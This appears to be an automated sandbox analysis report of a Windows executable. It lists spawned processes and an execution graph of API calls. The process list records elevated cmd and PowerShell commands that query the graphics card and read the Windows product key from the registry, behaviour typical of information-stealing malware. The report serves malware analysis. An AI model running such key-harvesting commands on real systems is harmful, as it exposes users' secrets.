                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                            Start time:02:42:24
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                            Start time:02:42:24
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                                                            Start time:02:42:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.4%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:20.1%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                                                              execution_graph 19380 7ff62cc8c590 19391 7ff62cc90348 EnterCriticalSection 19380->19391 20611 7ff62cc85480 20612 7ff62cc8548b 20611->20612 20620 7ff62cc8f314 20612->20620 20633 7ff62cc90348 EnterCriticalSection 20620->20633 19025 7ff62cc8f9fc 19026 7ff62cc8fbee 19025->19026 19028 7ff62cc8fa3e _isindst 19025->19028 19027 7ff62cc84f78 _get_daylight 11 API calls 19026->19027 19044 7ff62cc8fbde 19027->19044 19028->19026 19031 7ff62cc8fabe _isindst 19028->19031 19029 7ff62cc7c5c0 _log10_special 8 API calls 19030 7ff62cc8fc09 19029->19030 19046 7ff62cc96204 19031->19046 19036 7ff62cc8fc1a 19038 7ff62cc8a970 _isindst 17 API calls 19036->19038 19040 7ff62cc8fc2e 19038->19040 19043 7ff62cc8fb1b 19043->19044 19070 7ff62cc96248 19043->19070 19044->19029 19047 7ff62cc8fadc 19046->19047 19048 7ff62cc96213 19046->19048 19052 7ff62cc95608 19047->19052 19077 7ff62cc90348 EnterCriticalSection 19048->19077 19053 7ff62cc95611 19052->19053 19054 7ff62cc8faf1 19052->19054 19055 7ff62cc84f78 _get_daylight 11 API calls 19053->19055 19054->19036 19058 7ff62cc95638 19054->19058 19056 7ff62cc95616 19055->19056 19057 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19056->19057 19057->19054 19059 7ff62cc95641 19058->19059 19060 7ff62cc8fb02 19058->19060 19061 7ff62cc84f78 _get_daylight 11 API calls 19059->19061 19060->19036 19064 7ff62cc95668 19060->19064 19062 7ff62cc95646 19061->19062 19063 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19062->19063 19063->19060 19065 7ff62cc95671 19064->19065 19066 7ff62cc8fb13 19064->19066 19067 7ff62cc84f78 _get_daylight 11 API calls 19065->19067 19066->19036 19066->19043 19068 7ff62cc95676 19067->19068 19069 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19068->19069 19069->19066 19078 7ff62cc90348 EnterCriticalSection 19070->19078 16055 7ff62cc7ccac 16076 7ff62cc7ce7c 16055->16076 16058 7ff62cc7cdf8 16230 7ff62cc7d19c IsProcessorFeaturePresent 16058->16230 16059 7ff62cc7ccc8 __scrt_acquire_startup_lock 16061 7ff62cc7ce02 16059->16061 16067 7ff62cc7cce6 __scrt_release_startup_lock 16059->16067 16062 7ff62cc7d19c 7 API calls 16061->16062 16064 7ff62cc7ce0d __CxxCallCatchBlock 16062->16064 16063 7ff62cc7cd0b 16065 7ff62cc7cd91 16082 7ff62cc7d2e4 16065->16082 16067->16063 16067->16065 16219 7ff62cc89b9c 16067->16219 16069 7ff62cc7cd96 16085 7ff62cc71000 16069->16085 16073 7ff62cc7cdb9 16073->16064 16226 7ff62cc7d000 16073->16226 16077 7ff62cc7ce84 16076->16077 16078 7ff62cc7ce90 __scrt_dllmain_crt_thread_attach 16077->16078 16079 7ff62cc7ccc0 16078->16079 16080 7ff62cc7ce9d 16078->16080 16079->16058 16079->16059 16080->16079 16237 7ff62cc7d8f8 16080->16237 16264 7ff62cc9a540 16082->16264 16084 7ff62cc7d2fb GetStartupInfoW 16084->16069 16086 7ff62cc71009 16085->16086 16266 7ff62cc854f4 16086->16266 16088 7ff62cc737fb 16273 7ff62cc736b0 16088->16273 16095 7ff62cc7383c 16433 7ff62cc71c80 16095->16433 16096 7ff62cc7391b 16442 7ff62cc745b0 16096->16442 16100 7ff62cc7385b 16345 7ff62cc78a20 16100->16345 16101 7ff62cc7396a 16465 7ff62cc72710 16101->16465 16105 7ff62cc7388e 16112 7ff62cc738bb __std_exception_copy 16105->16112 16437 7ff62cc78b90 16105->16437 16106 7ff62cc7395d 16107 7ff62cc73984 16106->16107 16108 7ff62cc73962 16106->16108 16111 7ff62cc71c80 49 API calls 16107->16111 16461 7ff62cc800bc 16108->16461 16113 7ff62cc739a3 16111->16113 16114 7ff62cc78a20 14 API calls 16112->16114 16122 7ff62cc738de __std_exception_copy 16112->16122 16117 7ff62cc71950 115 API calls 16113->16117 16114->16122 16116 7ff62cc73a0b 16118 7ff62cc78b90 40 API calls 16116->16118 16119 7ff62cc739ce 16117->16119 16120 7ff62cc73a17 16118->16120 16119->16100 16121 7ff62cc739de 16119->16121 16123 7ff62cc78b90 40 API calls 16120->16123 16124 7ff62cc72710 54 API calls 16121->16124 16127 7ff62cc7390e __std_exception_copy 16122->16127 16476 7ff62cc78b30 16122->16476 16125 7ff62cc73a23 16123->16125 16133 7ff62cc73808 __std_exception_copy 16124->16133 16126 7ff62cc78b90 40 API calls 16125->16126 16126->16127 16128 7ff62cc78a20 14 API calls 16127->16128 16129 7ff62cc73a3b 16128->16129 16130 7ff62cc73b2f 16129->16130 16131 7ff62cc73a60 __std_exception_copy 16129->16131 16132 7ff62cc72710 54 API calls 16130->16132 16134 7ff62cc78b30 40 API calls 16131->16134 16142 7ff62cc73aab 16131->16142 16132->16133 16483 7ff62cc7c5c0 16133->16483 16134->16142 16135 7ff62cc78a20 14 API calls 16136 7ff62cc73bf4 __std_exception_copy 16135->16136 16137 7ff62cc73c46 16136->16137 16138 7ff62cc73d41 16136->16138 16139 7ff62cc73cd4 16137->16139 16140 7ff62cc73c50 16137->16140 16492 7ff62cc744d0 16138->16492 16144 7ff62cc78a20 14 API calls 16139->16144 16358 7ff62cc790e0 16140->16358 16142->16135 16147 7ff62cc73ce0 16144->16147 16145 7ff62cc73d4f 16148 7ff62cc73d65 16145->16148 16149 7ff62cc73d71 16145->16149 16151 7ff62cc73c61 16147->16151 16154 7ff62cc73ced 16147->16154 16495 7ff62cc74620 16148->16495 16150 7ff62cc71c80 49 API calls 16149->16150 16161 7ff62cc73cc8 __std_exception_copy 16150->16161 16157 7ff62cc72710 54 API calls 16151->16157 16158 7ff62cc71c80 49 API calls 16154->16158 16155 7ff62cc73dc4 16408 7ff62cc79400 16155->16408 16157->16133 16160 7ff62cc73d0b 16158->16160 16160->16161 16162 7ff62cc73d12 16160->16162 16161->16155 16163 7ff62cc73da7 SetDllDirectoryW LoadLibraryExW 16161->16163 16165 7ff62cc72710 54 API calls 16162->16165 16163->16155 16164 7ff62cc73dd7 SetDllDirectoryW 16167 7ff62cc73e0a 16164->16167 16208 7ff62cc73e5a 16164->16208 16165->16133 16169 7ff62cc78a20 14 API calls 16167->16169 16168 7ff62cc73ffc 16171 7ff62cc74029 16168->16171 16172 7ff62cc74006 PostMessageW GetMessageW 16168->16172 16175 7ff62cc73e16 __std_exception_copy 16169->16175 16170 7ff62cc73f1b 16413 7ff62cc733c0 16170->16413 16572 7ff62cc73360 16171->16572 16172->16171 16177 7ff62cc73ef2 16175->16177 16181 7ff62cc73e4e 16175->16181 16180 7ff62cc78b30 40 API calls 16177->16180 16180->16208 16181->16208 16498 7ff62cc76db0 16181->16498 16208->16168 16208->16170 16220 7ff62cc89bb3 16219->16220 16221 7ff62cc89bd4 16219->16221 16220->16065 18810 7ff62cc8a448 16221->18810 16224 7ff62cc7d328 GetModuleHandleW 16225 7ff62cc7d339 16224->16225 16225->16073 16227 7ff62cc7d011 16226->16227 16228 7ff62cc7cdd0 16227->16228 16229 7ff62cc7d8f8 7 API calls 16227->16229 16228->16063 16229->16228 16231 7ff62cc7d1c2 __CxxCallCatchBlock memcpy_s 16230->16231 16232 7ff62cc7d1e1 RtlCaptureContext RtlLookupFunctionEntry 16231->16232 16233 7ff62cc7d20a RtlVirtualUnwind 16232->16233 16234 7ff62cc7d246 memcpy_s 16232->16234 16233->16234 16235 7ff62cc7d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16234->16235 16236 7ff62cc7d2c6 __CxxCallCatchBlock 16235->16236 16236->16061 16238 7ff62cc7d90a 16237->16238 16239 7ff62cc7d900 16237->16239 16238->16079 16243 7ff62cc7dc94 16239->16243 16244 7ff62cc7dca3 16243->16244 16245 7ff62cc7d905 16243->16245 16251 7ff62cc7ded0 16244->16251 16247 7ff62cc7dd00 16245->16247 16248 7ff62cc7dd2b 16247->16248 16249 7ff62cc7dd2f 16248->16249 16250 7ff62cc7dd0e DeleteCriticalSection 16248->16250 16249->16238 16250->16248 16255 7ff62cc7dd38 16251->16255 16256 7ff62cc7de22 TlsFree 16255->16256 16258 7ff62cc7dd7c __vcrt_FlsAlloc 16255->16258 16257 7ff62cc7ddaa LoadLibraryExW 16260 7ff62cc7ddcb GetLastError 16257->16260 16261 7ff62cc7de49 16257->16261 16258->16256 16258->16257 16259 7ff62cc7de69 GetProcAddress 16258->16259 16263 7ff62cc7dded LoadLibraryExW 16258->16263 16259->16256 16260->16258 16261->16259 16262 7ff62cc7de60 FreeLibrary 16261->16262 16262->16259 16263->16258 16263->16261 16265 7ff62cc9a530 16264->16265 16265->16084 16265->16265 16268 7ff62cc8f4f0 16266->16268 16267 7ff62cc8f543 16585 7ff62cc8a884 16267->16585 16268->16267 16270 7ff62cc8f596 16268->16270 16595 7ff62cc8f3c8 16270->16595 16272 7ff62cc8f56c 16272->16088 16702 7ff62cc7c8c0 16273->16702 16276 7ff62cc736eb GetLastError 16709 7ff62cc72c50 16276->16709 16277 7ff62cc73710 16704 7ff62cc792f0 FindFirstFileExW 16277->16704 16281 7ff62cc7377d 16735 7ff62cc794b0 16281->16735 16282 7ff62cc73723 16724 7ff62cc79370 CreateFileW 16282->16724 16284 7ff62cc7c5c0 _log10_special 8 API calls 16286 7ff62cc737b5 16284->16286 16286->16133 16295 7ff62cc71950 16286->16295 16288 7ff62cc7378b 16291 7ff62cc72810 49 API calls 16288->16291 16293 7ff62cc73706 16288->16293 16289 7ff62cc7374c __vcrt_FlsAlloc 16289->16281 16290 7ff62cc73734 16727 7ff62cc72810 16290->16727 16291->16293 16293->16284 16296 7ff62cc745b0 108 API calls 16295->16296 16297 7ff62cc71985 16296->16297 16298 7ff62cc71c43 16297->16298 16299 7ff62cc77f80 83 API calls 16297->16299 16300 7ff62cc7c5c0 _log10_special 8 API calls 16298->16300 16301 7ff62cc719cb 16299->16301 16302 7ff62cc71c5e 16300->16302 16344 7ff62cc71a03 16301->16344 17140 7ff62cc80744 16301->17140 16302->16095 16302->16096 16304 7ff62cc800bc 74 API calls 16304->16298 16305 7ff62cc719e5 16306 7ff62cc71a08 16305->16306 16307 7ff62cc719e9 16305->16307 17144 7ff62cc8040c 16306->17144 16308 7ff62cc84f78 _get_daylight 11 API calls 16307->16308 16310 7ff62cc719ee 16308->16310 17147 7ff62cc72910 16310->17147 16312 7ff62cc71a26 16315 7ff62cc84f78 _get_daylight 11 API calls 16312->16315 16313 7ff62cc71a45 16318 7ff62cc71a5c 16313->16318 16319 7ff62cc71a7b 16313->16319 16316 7ff62cc71a2b 16315->16316 16317 7ff62cc72910 54 API calls 16316->16317 16317->16344 16320 7ff62cc84f78 _get_daylight 11 API calls 16318->16320 16321 7ff62cc71c80 49 API calls 16319->16321 16322 7ff62cc71a61 16320->16322 16323 7ff62cc71a92 16321->16323 16325 7ff62cc72910 54 API calls 16322->16325 16324 7ff62cc71c80 49 API calls 16323->16324 16326 7ff62cc71add 16324->16326 16325->16344 16327 7ff62cc80744 73 API calls 16326->16327 16328 7ff62cc71b01 16327->16328 16329 7ff62cc71b16 16328->16329 16330 7ff62cc71b35 16328->16330 16331 7ff62cc84f78 _get_daylight 11 API calls 16329->16331 16332 7ff62cc8040c _fread_nolock 53 API calls 16330->16332 16333 7ff62cc71b1b 16331->16333 16334 7ff62cc71b4a 16332->16334 16335 7ff62cc72910 54 API calls 16333->16335 16336 7ff62cc71b50 16334->16336 16337 7ff62cc71b6f 16334->16337 16335->16344 16339 7ff62cc84f78 _get_daylight 11 API calls 16336->16339 17162 7ff62cc80180 16337->17162 16340 7ff62cc71b55 16339->16340 16342 7ff62cc72910 54 API calls 16340->16342 16342->16344 16343 7ff62cc72710 54 API calls 16343->16344 16344->16304 16346 7ff62cc78a2a 16345->16346 16347 7ff62cc79400 2 API calls 16346->16347 16348 7ff62cc78a49 GetEnvironmentVariableW 16347->16348 16349 7ff62cc78a66 ExpandEnvironmentStringsW 16348->16349 16350 7ff62cc78ab2 16348->16350 16349->16350 16351 7ff62cc78a88 16349->16351 16352 7ff62cc7c5c0 _log10_special 8 API calls 16350->16352 16354 7ff62cc794b0 2 API calls 16351->16354 16353 7ff62cc78ac4 16352->16353 16353->16105 16355 7ff62cc78a9a 16354->16355 16356 7ff62cc7c5c0 _log10_special 8 API calls 16355->16356 16357 7ff62cc78aaa 16356->16357 16357->16105 16359 7ff62cc790f5 16358->16359 17380 7ff62cc78760 GetCurrentProcess OpenProcessToken 16359->17380 16362 7ff62cc78760 7 API calls 16363 7ff62cc79121 16362->16363 16364 7ff62cc7913a 16363->16364 16365 7ff62cc79154 16363->16365 16366 7ff62cc726b0 48 API calls 16364->16366 16367 7ff62cc726b0 48 API calls 16365->16367 16368 7ff62cc79152 16366->16368 16369 7ff62cc79167 LocalFree LocalFree 16367->16369 16368->16369 16370 7ff62cc79183 16369->16370 16372 7ff62cc7918f 16369->16372 17390 7ff62cc72b50 16370->17390 16373 7ff62cc7c5c0 _log10_special 8 API calls 16372->16373 16374 7ff62cc73c55 16373->16374 16374->16151 16375 7ff62cc78850 16374->16375 16376 7ff62cc78868 16375->16376 16377 7ff62cc7888c 16376->16377 16378 7ff62cc788ea GetTempPathW GetCurrentProcessId 16376->16378 16380 7ff62cc78a20 14 API calls 16377->16380 17399 7ff62cc725c0 16378->17399 16381 7ff62cc78898 16380->16381 17406 7ff62cc781c0 16381->17406 16388 7ff62cc78918 __std_exception_copy 16398 7ff62cc78955 __std_exception_copy 16388->16398 17403 7ff62cc88bd8 16388->17403 16393 7ff62cc7c5c0 _log10_special 8 API calls 16394 7ff62cc73cbb 16393->16394 16394->16151 16394->16161 16399 7ff62cc79400 2 API calls 16398->16399 16407 7ff62cc789c4 __std_exception_copy 16398->16407 16400 7ff62cc789a1 16399->16400 16401 7ff62cc789d9 16400->16401 16402 7ff62cc789a6 16400->16402 16404 7ff62cc882a8 38 API calls 16401->16404 16403 7ff62cc79400 2 API calls 16402->16403 16404->16407 16407->16393 16409 7ff62cc79422 MultiByteToWideChar 16408->16409 16410 7ff62cc79446 16408->16410 16409->16410 16412 7ff62cc7945c __std_exception_copy 16409->16412 16411 7ff62cc79463 MultiByteToWideChar 16410->16411 16410->16412 16411->16412 16412->16164 16424 7ff62cc733ce memcpy_s 16413->16424 16414 7ff62cc7c5c0 _log10_special 8 API calls 16416 7ff62cc73664 16414->16416 16415 7ff62cc735c7 16415->16414 16416->16133 16432 7ff62cc790c0 LocalFree 16416->16432 16418 7ff62cc71c80 49 API calls 16418->16424 16419 7ff62cc735e2 16421 7ff62cc72710 54 API calls 16419->16421 16421->16415 16423 7ff62cc735c9 16427 7ff62cc72710 54 API calls 16423->16427 16424->16415 16424->16418 16424->16419 16424->16423 16426 7ff62cc72a50 54 API calls 16424->16426 16430 7ff62cc735d0 16424->16430 17695 7ff62cc74550 16424->17695 17701 7ff62cc77e10 16424->17701 17713 7ff62cc71600 16424->17713 17761 7ff62cc77110 16424->17761 17765 7ff62cc74180 16424->17765 17809 7ff62cc74440 16424->17809 16426->16424 16427->16415 16431 7ff62cc72710 54 API calls 16430->16431 16431->16415 16434 7ff62cc71ca5 16433->16434 16435 7ff62cc849f4 49 API calls 16434->16435 16436 7ff62cc71cc8 16435->16436 16436->16100 16438 7ff62cc79400 2 API calls 16437->16438 16439 7ff62cc78ba4 16438->16439 16440 7ff62cc882a8 38 API calls 16439->16440 16441 7ff62cc78bb6 __std_exception_copy 16440->16441 16441->16112 16443 7ff62cc745bc 16442->16443 16444 7ff62cc79400 2 API calls 16443->16444 16445 7ff62cc745e4 16444->16445 16446 7ff62cc79400 2 API calls 16445->16446 16447 7ff62cc745f7 16446->16447 17992 7ff62cc86004 16447->17992 16450 7ff62cc7c5c0 _log10_special 8 API calls 16451 7ff62cc7392b 16450->16451 16451->16101 16452 7ff62cc77f80 16451->16452 16453 7ff62cc77fa4 16452->16453 16454 7ff62cc80744 73 API calls 16453->16454 16459 7ff62cc7807b __std_exception_copy 16453->16459 16455 7ff62cc77fc0 16454->16455 16455->16459 18384 7ff62cc87938 16455->18384 16457 7ff62cc80744 73 API calls 16460 7ff62cc77fd5 16457->16460 16458 7ff62cc8040c _fread_nolock 53 API calls 16458->16460 16459->16106 16460->16457 16460->16458 16460->16459 16462 7ff62cc800ec 16461->16462 18399 7ff62cc7fe98 16462->18399 16464 7ff62cc80105 16464->16101 16466 7ff62cc7c8c0 16465->16466 16467 7ff62cc72734 GetCurrentProcessId 16466->16467 16468 7ff62cc71c80 49 API calls 16467->16468 16469 7ff62cc72787 16468->16469 16470 7ff62cc849f4 49 API calls 16469->16470 16471 7ff62cc727cf 16470->16471 16472 7ff62cc72620 12 API calls 16471->16472 16473 7ff62cc727f1 16472->16473 16474 7ff62cc7c5c0 _log10_special 8 API calls 16473->16474 16475 7ff62cc72801 16474->16475 16475->16133 16477 7ff62cc79400 2 API calls 16476->16477 16478 7ff62cc78b4c 16477->16478 16479 7ff62cc79400 2 API calls 16478->16479 16480 7ff62cc78b5c 16479->16480 16481 7ff62cc882a8 38 API calls 16480->16481 16482 7ff62cc78b6a __std_exception_copy 16481->16482 16482->16116 16484 7ff62cc7c5c9 16483->16484 16485 7ff62cc73ca7 16484->16485 16486 7ff62cc7c950 IsProcessorFeaturePresent 16484->16486 16485->16224 16487 7ff62cc7c968 16486->16487 18410 7ff62cc7cb48 RtlCaptureContext 16487->18410 16493 7ff62cc71c80 49 API calls 16492->16493 16494 7ff62cc744ed 16493->16494 16494->16145 16496 7ff62cc71c80 49 API calls 16495->16496 16497 7ff62cc74650 16496->16497 16497->16161 16497->16497 16499 7ff62cc76dc5 16498->16499 16500 7ff62cc73e6c 16499->16500 16501 7ff62cc84f78 _get_daylight 11 API calls 16499->16501 16504 7ff62cc77330 16500->16504 16502 7ff62cc76dd2 16501->16502 16503 7ff62cc72910 54 API calls 16502->16503 16503->16500 18415 7ff62cc71470 16504->18415 16506 7ff62cc77358 18521 7ff62cc76350 16572->18521 16575 7ff62cc73399 16581 7ff62cc73670 16575->16581 16602 7ff62cc8a5cc 16585->16602 16589 7ff62cc8a8bf 16589->16272 16701 7ff62cc854dc EnterCriticalSection 16595->16701 16603 7ff62cc8a623 16602->16603 16604 7ff62cc8a5e8 GetLastError 16602->16604 16603->16589 16608 7ff62cc8a638 16603->16608 16605 7ff62cc8a5f8 16604->16605 16615 7ff62cc8b400 16605->16615 16609 7ff62cc8a654 GetLastError SetLastError 16608->16609 16610 7ff62cc8a66c 16608->16610 16609->16610 16610->16589 16611 7ff62cc8a970 IsProcessorFeaturePresent 16610->16611 16612 7ff62cc8a983 16611->16612 16693 7ff62cc8a684 16612->16693 16616 7ff62cc8b41f FlsGetValue 16615->16616 16617 7ff62cc8b43a FlsSetValue 16615->16617 16618 7ff62cc8b434 16616->16618 16620 7ff62cc8a613 SetLastError 16616->16620 16619 7ff62cc8b447 16617->16619 16617->16620 16618->16617 16632 7ff62cc8ec08 16619->16632 16620->16603 16622 7ff62cc8b456 16623 7ff62cc8b474 FlsSetValue 16622->16623 16624 7ff62cc8b464 FlsSetValue 16622->16624 16626 7ff62cc8b480 FlsSetValue 16623->16626 16627 7ff62cc8b492 16623->16627 16625 7ff62cc8b46d 16624->16625 16639 7ff62cc8a9b8 16625->16639 16626->16625 16645 7ff62cc8af64 16627->16645 16633 7ff62cc8ec19 _get_daylight 16632->16633 16634 7ff62cc8ec6a 16633->16634 16635 7ff62cc8ec4e HeapAlloc 16633->16635 16650 7ff62cc93600 16633->16650 16653 7ff62cc84f78 16634->16653 16635->16633 16636 7ff62cc8ec68 16635->16636 16636->16622 16640 7ff62cc8a9bd RtlFreeHeap 16639->16640 16641 7ff62cc8a9ec 16639->16641 16640->16641 16642 7ff62cc8a9d8 GetLastError 16640->16642 16641->16620 16643 7ff62cc8a9e5 __free_lconv_num 16642->16643 16644 7ff62cc84f78 _get_daylight 9 API calls 16643->16644 16644->16641 16679 7ff62cc8ae3c 16645->16679 16656 7ff62cc93640 16650->16656 16662 7ff62cc8b338 GetLastError 16653->16662 16655 7ff62cc84f81 16655->16636 16661 7ff62cc90348 EnterCriticalSection 16656->16661 16663 7ff62cc8b379 FlsSetValue 16662->16663 16664 7ff62cc8b35c 16662->16664 16665 7ff62cc8b369 16663->16665 16666 7ff62cc8b38b 16663->16666 16664->16663 16664->16665 16667 7ff62cc8b3e5 SetLastError 16665->16667 16668 7ff62cc8ec08 _get_daylight 5 API calls 16666->16668 16667->16655 16669 7ff62cc8b39a 16668->16669 16670 7ff62cc8b3b8 FlsSetValue 16669->16670 16671 7ff62cc8b3a8 FlsSetValue 16669->16671 16673 7ff62cc8b3c4 FlsSetValue 16670->16673 16674 7ff62cc8b3d6 16670->16674 16672 7ff62cc8b3b1 16671->16672 16676 7ff62cc8a9b8 __free_lconv_num 5 API calls 16672->16676 16673->16672 16675 7ff62cc8af64 _get_daylight 5 API calls 16674->16675 16677 7ff62cc8b3de 16675->16677 16676->16665 16678 7ff62cc8a9b8 __free_lconv_num 5 API calls 16677->16678 16678->16667 16691 7ff62cc90348 EnterCriticalSection 16679->16691 16694 7ff62cc8a6be __CxxCallCatchBlock memcpy_s 16693->16694 16695 7ff62cc8a6e6 RtlCaptureContext RtlLookupFunctionEntry 16694->16695 16696 7ff62cc8a720 RtlVirtualUnwind 16695->16696 16697 7ff62cc8a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16695->16697 16696->16697 16698 7ff62cc8a7a8 __CxxCallCatchBlock 16697->16698 16699 7ff62cc7c5c0 _log10_special 8 API calls 16698->16699 16700 7ff62cc8a7c7 GetCurrentProcess TerminateProcess 16699->16700 16703 7ff62cc736bc GetModuleFileNameW 16702->16703 16703->16276 16703->16277 16705 7ff62cc7932f FindClose 16704->16705 16706 7ff62cc79342 16704->16706 16705->16706 16707 7ff62cc7c5c0 _log10_special 8 API calls 16706->16707 16708 7ff62cc7371a 16707->16708 16708->16281 16708->16282 16710 7ff62cc7c8c0 16709->16710 16711 7ff62cc72c70 GetCurrentProcessId 16710->16711 16740 7ff62cc726b0 16711->16740 16713 7ff62cc72cb9 16744 7ff62cc84c48 16713->16744 16716 7ff62cc726b0 48 API calls 16717 7ff62cc72d34 FormatMessageW 16716->16717 16719 7ff62cc72d6d 16717->16719 16720 7ff62cc72d7f MessageBoxW 16717->16720 16721 7ff62cc726b0 48 API calls 16719->16721 16722 7ff62cc7c5c0 _log10_special 8 API calls 16720->16722 16721->16720 16723 7ff62cc72daf 16722->16723 16723->16293 16725 7ff62cc73730 16724->16725 16726 7ff62cc793b0 GetFinalPathNameByHandleW CloseHandle 16724->16726 16725->16289 16725->16290 16726->16725 16728 7ff62cc72834 16727->16728 16729 7ff62cc726b0 48 API calls 16728->16729 16730 7ff62cc72887 16729->16730 16731 7ff62cc84c48 48 API calls 16730->16731 16732 7ff62cc728d0 MessageBoxW 16731->16732 16733 7ff62cc7c5c0 _log10_special 8 API calls 16732->16733 16734 7ff62cc72900 16733->16734 16734->16293 16736 7ff62cc794da WideCharToMultiByte 16735->16736 16737 7ff62cc79505 16735->16737 16736->16737 16739 7ff62cc7951b __std_exception_copy 16736->16739 16738 7ff62cc79522 WideCharToMultiByte 16737->16738 16737->16739 16738->16739 16739->16288 16741 7ff62cc726d5 16740->16741 16742 7ff62cc84c48 48 API calls 16741->16742 16743 7ff62cc726f8 16742->16743 16743->16713 16748 7ff62cc84ca2 16744->16748 16745 7ff62cc84cc7 16746 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16745->16746 16750 7ff62cc84cf1 16746->16750 16747 7ff62cc84d03 16762 7ff62cc83000 16747->16762 16748->16745 16748->16747 16751 7ff62cc7c5c0 _log10_special 8 API calls 16750->16751 16753 7ff62cc72d04 16751->16753 16752 7ff62cc8a9b8 __free_lconv_num 11 API calls 16752->16750 16753->16716 16755 7ff62cc84e0a 16758 7ff62cc84e14 16755->16758 16761 7ff62cc84de4 16755->16761 16756 7ff62cc8a9b8 __free_lconv_num 11 API calls 16756->16750 16757 7ff62cc84db0 16760 7ff62cc84db9 16757->16760 16757->16761 16759 7ff62cc8a9b8 __free_lconv_num 11 API calls 16758->16759 16759->16750 16760->16756 